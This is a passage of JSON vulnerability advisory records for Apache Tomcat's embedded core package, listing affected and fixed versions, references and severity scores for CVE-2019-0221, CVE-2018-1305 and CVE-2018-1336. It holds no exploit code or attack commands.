"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/05/GHSA-jjpq-gp5q-8q6w/GHSA-jjpq-gp5q-8q6w.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, 
"ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "7.0.0" }, { "fixed": "7.0.94" } ] } ], "versions": [ "7.0.0", "7.0.11", "7.0.12", "7.0.14", "7.0.16", "7.0.19", "7.0.2", "7.0.20", "7.0.21", "7.0.22", "7.0.23", "7.0.25", "7.0.26", "7.0.27", "7.0.28", "7.0.29", "7.0.30", "7.0.32", "7.0.33", "7.0.34", "7.0.35", "7.0.37", "7.0.39", "7.0.4", "7.0.40", "7.0.41", "7.0.42", "7.0.47", "7.0.5", "7.0.50", "7.0.52", "7.0.53", "7.0.54", "7.0.55", "7.0.56", "7.0.57", "7.0.59", "7.0.6", "7.0.61", "7.0.62", "7.0.63", "7.0.64", "7.0.65", "7.0.67", "7.0.68", "7.0.69", "7.0.70", "7.0.72", "7.0.73", "7.0.75", "7.0.76", "7.0.77", "7.0.78", "7.0.79", "7.0.8", "7.0.81", "7.0.82", "7.0.84", "7.0.85", "7.0.86", "7.0.88", "7.0.90", "7.0.91", "7.0.92", "7.0.93" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/05/GHSA-jjpq-gp5q-8q6w/GHSA-jjpq-gp5q-8q6w.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-0221" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/15fcd166ea2c1bb79e8541b8e1a43da9c452ceea" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/44ec74c44dcd05cd7e90967c04d40b51440ecd7e" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/4fcdf706f3ecf35912a600242f89637f5acb32da" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/ZQTZ5BJ5F4KV6N53SGNKSW3UY5DBIQ46" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/NPHQEL5AQ6LZSZD2Y6TYZ4RC3WI7NXJ3" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZQTZ5BJ5F4KV6N53SGNKSW3UY5DBIQ46" }, { "type": "WEB", "url": "https://seclists.org/bugtraq/2019/Dec/43" }, { "type": "WEB", "url": "https://security.gentoo.org/glsa/202003-43" }, { "type": "WEB", 
"url": "https://security.netapp.com/advisory/ntap-20190606-0001" }, { "type": "WEB", "url": "https://support.f5.com/csp/article/K13184144?utm_source=f5support\u0026amp%3Butm_medium=RSS" }, { "type": "WEB", "url": "https://support.f5.com/csp/article/K13184144?utm_source=f5support\u0026amp;utm_medium=RSS" }, { "type": "WEB", "url": "https://tomcat.apache.org/security-7.html" }, { "type": "WEB", "url": "https://tomcat.apache.org/security-8.html" }, { "type": "WEB", "url": "https://tomcat.apache.org/security-9.html" }, { "type": "WEB", "url": "https://usn.ubuntu.com/4128-1" }, { "type": "WEB", "url": "https://usn.ubuntu.com/4128-2" }, { "type": "WEB", "url": "https://web.archive.org/web/20200227055048/http://www.securityfocus.com/bid/108545" }, { "type": "WEB", "url": "https://www.debian.org/security/2019/dsa-4596" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuApr2021.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuapr2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujan2020.html" }, { "type": "WEB", "url": "https://wwws.nightwatchcybersecurity.com/2019/05/27/xss-in-ssi-printenv-command-apache-tomcat-cve-2019-0221" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:3929" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:3931" }, { "type": "PACKAGE", "url": "https://github.com/apache/tomcat" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/6e6e9eacf7b28fd63d249711e9d3ccd4e0a83f556e324aee37be5a8c%40%3Cannounce.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/6e6e9eacf7b28fd63d249711e9d3ccd4e0a83f556e324aee37be5a8c@%3Cannounce.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r3bbb800a816d0a51eccc5a228c58736960a9fffafa581a225834d97d%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": 
"https://lists.apache.org/thread.html/r3bbb800a816d0a51eccc5a228c58736960a9fffafa581a225834d97d@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r48c1444845fe15a823e1374674bfc297d5008a5453788099ea14caf0%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r48c1444845fe15a823e1374674bfc297d5008a5453788099ea14caf0@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r6ccee4e849bc77df0840c7f853f6bd09d426f6741247da2b7429d5d9%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r6ccee4e849bc77df0840c7f853f6bd09d426f6741247da2b7429d5d9@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r6d03e45b81eab03580cf7f8bb51cb3e9a1b10a2cc0c6a2d3cc92ed0c%40%3Cannounce.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r6d03e45b81eab03580cf7f8bb51cb3e9a1b10a2cc0c6a2d3cc92ed0c@%3Cannounce.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r9136ff5b13e4f1941360b5a309efee2c114a14855578c3a2cbe5d19c%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r9136ff5b13e4f1941360b5a309efee2c114a14855578c3a2cbe5d19c@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/raba0fabaf4d56d4325ab2aca8814f0b30a237ab83d8106b115ee279a%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/raba0fabaf4d56d4325ab2aca8814f0b30a237ab83d8106b115ee279a@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2019/05/msg00044.html" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2019/08/msg00015.html" }, { "type": "WEB", "url": 
"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/NPHQEL5AQ6LZSZD2Y6TYZ4RC3WI7NXJ3" }, { "type": "WEB", "url": "http://lists.opensuse.org/opensuse-security-announce/2019-06/msg00090.html" }, { "type": "WEB", "url": "http://lists.opensuse.org/opensuse-security-announce/2019-07/msg00054.html" }, { "type": "WEB", "url": "http://packetstormsecurity.com/files/163457/Apache-Tomcat-9.0.0.M1-Cross-Site-Scripting.html" }, { "type": "WEB", "url": "http://seclists.org/fulldisclosure/2019/May/50" } ], "database_specific": { "cwe_ids": [ "CWE-79" ], "github_reviewed": true, "github_reviewed_at": "2019-05-30T03:30:07Z", "nvd_published_at": "2019-05-28T22:29:00Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-jx6h-3fjx-cgv5", "published": "2018-10-17T16:31:48Z", "modified": "2024-11-29T05:50:11.687725Z", "aliases": [ "CVE-2018-1305" ], "summary": "Apache Tomcat information exposure vulnerability", "details": "Security constraints defined by annotations of Servlets in Apache Tomcat 9.0.0.M1 to 9.0.4, 8.5.0 to 8.5.27, 8.0.0.RC1 to 8.0.49 and 7.0.0 to 7.0.84 were only applied once a Servlet had been loaded. Because security constraints defined in this way apply to the URL pattern and any URLs below that point, it was possible - depending on the order Servlets were loaded - for some security constraints not to be applied. 
This could have exposed resources to users who were not authorised to access them.", "affected": [ { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "9.0.0M1" }, { "fixed": "9.0.5" } ] } ], "versions": [ "9.0.0.M1", "9.0.0.M10", "9.0.0.M11", "9.0.0.M13", "9.0.0.M15", "9.0.0.M17", "9.0.0.M18", "9.0.0.M19", "9.0.0.M20", "9.0.0.M21", "9.0.0.M22", "9.0.0.M25", "9.0.0.M26", "9.0.0.M27", "9.0.0.M3", "9.0.0.M4", "9.0.0.M6", "9.0.0.M8", "9.0.0.M9", "9.0.1", "9.0.2", "9.0.4" ], "database_specific": { "last_known_affected_version_range": "\u003c= 9.0.4", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/10/GHSA-jx6h-3fjx-cgv5/GHSA-jx6h-3fjx-cgv5.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "8.5.0" }, { "fixed": "8.5.28" } ] } ], "versions": [ "8.5.0", "8.5.11", "8.5.12", "8.5.13", "8.5.14", "8.5.15", "8.5.16", "8.5.19", "8.5.2", "8.5.20", "8.5.21", "8.5.23", "8.5.24", "8.5.27", "8.5.3", "8.5.4", "8.5.5", "8.5.6", "8.5.8", "8.5.9" ], "database_specific": { "last_known_affected_version_range": "\u003c= 8.5.27", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/10/GHSA-jx6h-3fjx-cgv5/GHSA-jx6h-3fjx-cgv5.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "7.0.0" }, { "fixed": "7.0.85" } ] } ], "versions": [ "7.0.0", "7.0.11", "7.0.12", "7.0.14", "7.0.16", "7.0.19", "7.0.2", "7.0.20", "7.0.21", "7.0.22", "7.0.23", "7.0.25", "7.0.26", "7.0.27", "7.0.28", "7.0.29", 
"7.0.30", "7.0.32", "7.0.33", "7.0.34", "7.0.35", "7.0.37", "7.0.39", "7.0.4", "7.0.40", "7.0.41", "7.0.42", "7.0.47", "7.0.5", "7.0.50", "7.0.52", "7.0.53", "7.0.54", "7.0.55", "7.0.56", "7.0.57", "7.0.59", "7.0.6", "7.0.61", "7.0.62", "7.0.63", "7.0.64", "7.0.65", "7.0.67", "7.0.68", "7.0.69", "7.0.70", "7.0.72", "7.0.73", "7.0.75", "7.0.76", "7.0.77", "7.0.78", "7.0.79", "7.0.8", "7.0.81", "7.0.82", "7.0.84" ], "database_specific": { "last_known_affected_version_range": "\u003c= 7.0.84", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/10/GHSA-jx6h-3fjx-cgv5/GHSA-jx6h-3fjx-cgv5.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-1305" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/2349801827f09fb6582a8afdeca704294106ad9a" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/2aac69f694d42d9219eb27018b3da0ae1bdd73ab" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/3e54b2a6314eda11617ff7a7b899c251e222b1a1" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/4d637bc3986e5d09b9363e2144b8ba74fa6eac3a" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/c63b96d72cd39287e17b2ba698f4eee0ba508073" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/de6b4fd58b64828f374503b9ec76a12017b92895" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/raba0fabaf4d56d4325ab2aca8814f0b30a237ab83d8106b115ee279a%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r9136ff5b13e4f1941360b5a309efee2c114a14855578c3a2cbe5d19c@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r9136ff5b13e4f1941360b5a309efee2c114a14855578c3a2cbe5d19c%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": 
"https://lists.apache.org/thread.html/r6ccee4e849bc77df0840c7f853f6bd09d426f6741247da2b7429d5d9@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r6ccee4e849bc77df0840c7f853f6bd09d426f6741247da2b7429d5d9%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r48c1444845fe15a823e1374674bfc297d5008a5453788099ea14caf0@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r48c1444845fe15a823e1374674bfc297d5008a5453788099ea14caf0%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r3bbb800a816d0a51eccc5a228c58736960a9fffafa581a225834d97d@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r3bbb800a816d0a51eccc5a228c58736960a9fffafa581a225834d97d%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/eb6efa8d59c45a7a9eff94c4b925467d3b3fec8ba7697f3daa314b04@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/eb6efa8d59c45a7a9eff94c4b925467d3b3fec8ba7697f3daa314b04%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/e85e83e9954f169bbb77b44baae5a33d8de878df557bb32b7f793661@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/e85e83e9954f169bbb77b44baae5a33d8de878df557bb32b7f793661%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/raba0fabaf4d56d4325ab2aca8814f0b30a237ab83d8106b115ee279a@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2018/03/msg00004.html" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2018/06/msg00008.html" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2018/07/msg00044.html" }, { "type": "WEB", "url": 
"https://security.netapp.com/advisory/ntap-20180706-0001" }, { "type": "WEB", "url": "https://usn.ubuntu.com/3665-1" }, { "type": "WEB", "url": "https://web.archive.org/web/20200227030042/http://www.securityfocus.com/bid/103144" }, { "type": "WEB", "url": "https://web.archive.org/web/20200516094320/http://www.securitytracker.com/id/1040428" }, { "type": "WEB", "url": "https://www.debian.org/security/2018/dsa-4281" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuapr2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/technetwork/security-advisory/cpuapr2019-5072813.html" }, { "type": "WEB", "url": "https://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2018:0465" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2018:0466" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2018:1320" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2018:2939" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:2205" }, { "type": "PACKAGE", "url": "https://github.com/apache/tomcat" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/1dd0a59c1295cc08ce4c9e7edae5ad2268acc9ba55adcefa0532e5ba%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/1dd0a59c1295cc08ce4c9e7edae5ad2268acc9ba55adcefa0532e5ba@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/343558d982879bf88ec20dbf707f8c11255f8e219e81d45c4f8d0551%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/343558d982879bf88ec20dbf707f8c11255f8e219e81d45c4f8d0551@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/388a323769f1dff84c9ec905455aa73fbcb20338e3c7eb131457f708%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": 
"https://lists.apache.org/thread.html/388a323769f1dff84c9ec905455aa73fbcb20338e3c7eb131457f708@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/3d19773b4cf0377db62d1e9328bf9160bf1819f04f988315086931d7%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/3d19773b4cf0377db62d1e9328bf9160bf1819f04f988315086931d7@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/5c0e00fd31efc11e147bf99d0f03c00a734447d3b131ab0818644cdb%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/5c0e00fd31efc11e147bf99d0f03c00a734447d3b131ab0818644cdb@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/6af47120905aa7d8fe12f42e8ff2284fb338ba141d3b77b8c7cb61b3%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/6af47120905aa7d8fe12f42e8ff2284fb338ba141d3b77b8c7cb61b3@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/845312a10aabbe2c499fca94003881d2c79fc993d85f34c1f5c77424%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/845312a10aabbe2c499fca94003881d2c79fc993d85f34c1f5c77424@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/88855876c33f2f9c532ffb75bfee570ccf0b17ffa77493745af9a17a%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/88855876c33f2f9c532ffb75bfee570ccf0b17ffa77493745af9a17a@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/b5e3f51d28cd5d9b1809f56594f2cf63dcd6a90429e16ea9f83bbedc%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/b5e3f51d28cd5d9b1809f56594f2cf63dcd6a90429e16ea9f83bbedc@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": 
"https://lists.apache.org/thread.html/d3354bb0a4eda4acc0a66f3eb24a213fdb75d12c7d16060b23e65781%40%3Cannounce.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/d3354bb0a4eda4acc0a66f3eb24a213fdb75d12c7d16060b23e65781@%3Cannounce.tomcat.apache.org%3E" }, { "type": "WEB", "url": "http://www.oracle.com/technetwork/security-advisory/cpujul2018-4258247.html" }, { "type": "WEB", "url": "http://www.oracle.com/technetwork/security-advisory/cpuoct2018-4428296.html" } ], "database_specific": { "cwe_ids": [], "github_reviewed": true, "github_reviewed_at": "2020-06-16T21:44:18Z", "nvd_published_at": "2018-02-23T23:29:00Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-m59c-jpc8-m2x4", "published": "2018-10-17T16:32:18Z", "modified": "2024-03-12T05:33:41.550174Z", "aliases": [ "CVE-2018-1336" ], "summary": "In Apache Tomcat there is an improper handing of overflow in the UTF-8 decoder ", "details": "An improper handing of overflow in the UTF-8 decoder with supplementary characters can lead to an infinite loop in the decoder causing a Denial of Service. 
Versions Affected: Apache Tomcat 9.0.0.M9 to 9.0.7, 8.5.0 to 8.5.30, 8.0.0.RC1 to 8.0.51, and 7.0.28 to 7.0.86.", "affected": [ { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "9.0.0.M9" }, { "fixed": "9.0.8" } ] } ], "versions": [ "9.0.0.M10", "9.0.0.M11", "9.0.0.M13", "9.0.0.M15", "9.0.0.M17", "9.0.0.M18", "9.0.0.M19", "9.0.0.M20", "9.0.0.M21", "9.0.0.M22", "9.0.0.M25", "9.0.0.M26", "9.0.0.M27", "9.0.0.M9", "9.0.1", "9.0.2", "9.0.4", "9.0.5", "9.0.6", "9.0.7" ], "database_specific": { "last_known_affected_version_range": "\u003c= 9.0.7", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/10/GHSA-m59c-jpc8-m2x4/GHSA-m59c-jpc8-m2x4.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "8.5.0" }, { "fixed": "8.5.31" } ] } ], "versions": [ "8.5.0", "8.5.11", "8.5.12", "8.5.13", "8.5.14", "8.5.15", "8.5.16", "8.5.19", "8.5.2", "8.5.20", "8.5.21", "8.5.23", "8.5.24", "8.5.27", "8.5.28", "8.5.29", "8.5.3", "8.5.30", "8.5.4", "8.5.5", "8.5.6", "8.5.8", "8.5.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/10/GHSA-m59c-jpc8-m2x4/GHSA-m59c-jpc8-m2x4.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "8.0.0RC1" }, { "fixed": "8.0.51" } ] } ], "versions": [ "8.0.0-RC1", "8.0.0-RC10", "8.0.0-RC3", "8.0.0-RC5", "8.0.1", "8.0.11", "8.0.12", "8.0.14", "8.0.15", "8.0.17", "8.0.18", "8.0.20", "8.0.21", "8.0.22", "8.0.23", "8.0.24", "8.0.26", 
"8.0.27", "8.0.28", "8.0.29", "8.0.3", "8.0.30", "8.0.32", "8.0.33", "8.0.35", "8.0.36", "8.0.37", "8.0.38", "8.0.39", "8.0.41", "8.0.42", "8.0.43", "8.0.44", "8.0.45", "8.0.46", "8.0.47", "8.0.48", "8.0.49", "8.0.5", "8.0.50", "8.0.8", "8.0.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/10/GHSA-m59c-jpc8-m2x4/GHSA-m59c-jpc8-m2x4.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "7.0.28" }, { "fixed": "7.0.87" } ] } ], "versions": [ "7.0.28", "7.0.29", "7.0.30", "7.0.32", "7.0.33", "7.0.34", "7.0.35", "7.0.37", "7.0.39", "7.0.40", "7.0.41", "7.0.42", "7.0.47", "7.0.50", "7.0.52", "7.0.53", "7.0.54", "7.0.55", "7.0.56", "7.0.57", "7.0.59", "7.0.61", "7.0.62", "7.0.63", "7.0.64", "7.0.65", "7.0.67", "7.0.68", "7.0.69", "7.0.70", "7.0.72", "7.0.73", "7.0.75", "7.0.76", "7.0.77", "7.0.78", "7.0.79", "7.0.81", "7.0.82", "7.0.84", "7.0.85", "7.0.86" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/10/GHSA-m59c-jpc8-m2x4/GHSA-m59c-jpc8-m2x4.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-1336" }, { "type": "WEB", "url": "https://github.com/apache/tomcat80/commit/9e9b7fe1b5732277a26e437f1d32155de6208ef2" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/e00812b94e5830b2be3de04f4ae4ade38a700074" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/92cd494555598e99dd691712e8ee426a2f9c2e93" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/156d76a6afeef440d14044a560d6ad1d029361c4" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r6ccee4e849bc77df0840c7f853f6bd09d426f6741247da2b7429d5d9@%3Cdev.tomcat.apache.org%3E" }, { "type": 
"WEB", "url": "https://lists.apache.org/thread.html/r6ccee4e849bc77df0840c7f853f6bd09d426f6741247da2b7429d5d9%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r48c1444845fe15a823e1374674bfc297d5008a5453788099ea14caf0@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r48c1444845fe15a823e1374674bfc297d5008a5453788099ea14caf0%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r3bbb800a816d0a51eccc5a228c58736960a9fffafa581a225834d97d@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r3bbb800a816d0a51eccc5a228c58736960a9fffafa581a225834d97d%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/eb6efa8d59c45a7a9eff94c4b925467d3b3fec8ba7697f3daa314b04@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/eb6efa8d59c45a7a9eff94c4b925467d3b3fec8ba7697f3daa314b04%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/e85e83e9954f169bbb77b44baae5a33d8de878df557bb32b7f793661@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/e85e83e9954f169bbb77b44baae5a33d8de878df557bb32b7f793661%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/b5e3f51d28cd5d9b1809f56594f2cf63dcd6a90429e16ea9f83bbedc@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/b5e3f51d28cd5d9b1809f56594f2cf63dcd6a90429e16ea9f83bbedc%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/88855876c33f2f9c532ffb75bfee570ccf0b17ffa77493745af9a17a@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/88855876c33f2f9c532ffb75bfee570ccf0b17ffa77493745af9a17a%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": 
"https://lists.apache.org/thread.html/r9136ff5b13e4f1941360b5a309efee2c114a14855578c3a2cbe5d19c%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r9136ff5b13e4f1941360b5a309efee2c114a14855578c3a2cbe5d19c@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/raba0fabaf4d56d4325ab2aca8814f0b30a237ab83d8106b115ee279a%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/raba0fabaf4d56d4325ab2aca8814f0b30a237ab83d8106b115ee279a@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2018/09/msg00001.html" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20180817-0001" }, { "type": "WEB", "url": "https://support.f5.com/csp/article/K73008537?utm_source=f5support\u0026amp%3Butm_medium=RSS" }, { "type": "WEB", "url": "https://support.f5.com/csp/article/K73008537?utm_source=f5support\u0026amp;utm_medium=RSS" }, { "type": "WEB", "url": "https://usn.ubuntu.com/3723-1" }, { "type": "WEB", "url": "https://web.archive.org/web/20190703075545/http://www.securitytracker.com/id/1041375" }, { "type": "WEB", "url": "https://web.archive.org/web/20200227102810/http://www.securityfocus.com/bid/104898" }, { "type": "WEB", "url": "https://www.debian.org/security/2018/dsa-4281" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuapr2020.html" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHEA-2018:2188" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHEA-2018:2189" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2018:2700" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2018:2701" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2018:2740" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2018:2741" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2018:2742" }, { 
